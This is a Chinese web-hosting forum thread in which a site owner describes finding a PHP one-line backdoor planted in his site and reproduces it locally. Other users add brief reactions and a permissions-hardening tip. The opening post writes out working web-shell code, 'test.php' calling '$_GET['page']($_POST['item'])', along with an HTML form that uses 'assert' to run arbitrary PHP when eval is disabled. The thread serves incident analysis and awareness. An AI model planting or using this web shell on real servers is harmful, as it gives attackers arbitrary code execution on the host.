全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 6907|回复: 55
打印 上一主题 下一主题

某人在我一个页面里留下了这个

  [复制链接]
跳转到指定楼层
2#
 楼主| 发表于 2012-2-16 15:13:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本帖最后由 miniloop 于 2012-2-16 17:42 编辑

莫名奇妙就负载奇高,默默地查了一晚上,发现某人在一个php页面里留下了这个
  1. @ $_GET['page']($_POST['item']);
复制代码
这不就是传说中的一句话后门么?

======================================
编辑for更新


黑阔厉害啊,尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval,他不可能用,网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html
  1. <form action = "test.php?page=assert" method = "post">
  2.    <input type = "text" name = "item" />
  3.     <input type = "submit" value = "运行" />
  4.    </form>
复制代码
复制代码
再建一个test.php
  1. <?php $_GET['page']($_POST['item']);  ?>
复制代码
复制代码
这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php.

在输入框里输入: phpinfo(); 点击运行按钮,
尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊

dfdfdf.gif (5.61 KB, 下载次数: 3)
dfdfdfttt.gif (12.51 KB, 下载次数: 0)

评分

参与人数 2威望 +6 收起 理由
jones + 1 我擦,这也可以。但你咋往别人服务器上传这.
edear + 5 很给力!

查看全部评分

56#
发表于 2012-2-23 00:44:10 | 只看该作者
不懂
55#
发表于 2012-2-22 06:39:16 | 只看该作者
楼主v5, 这样也可以查到。
54#
发表于 2012-2-20 20:36:14 | 只看该作者
这个真危险啊
53#
发表于 2012-2-19 23:37:09 | 只看该作者
学习了
52#
发表于 2012-2-19 17:31:27 | 只看该作者
php比较自由,所以比较危险
51#
发表于 2012-2-19 03:32:21 | 只看该作者
真心看不懂
50#
发表于 2012-2-18 23:19:20 | 只看该作者
不懂啊
49#
发表于 2012-2-18 23:07:41 | 只看该作者
miniloop 发表于 2012-2-17 17:40
传毛文件!

真实情况是那家伙不知从哪个漏洞进来了并在我的member.php这个文件上加了那一句话,test.php是 ...

不给member.php修改权限,只给执行权限,他怎么加进去?安全权限要做好,就不怕了
48#
发表于 2012-2-18 22:59:55 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-7 10:57 , Processed in 0.287099 second(s), 13 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表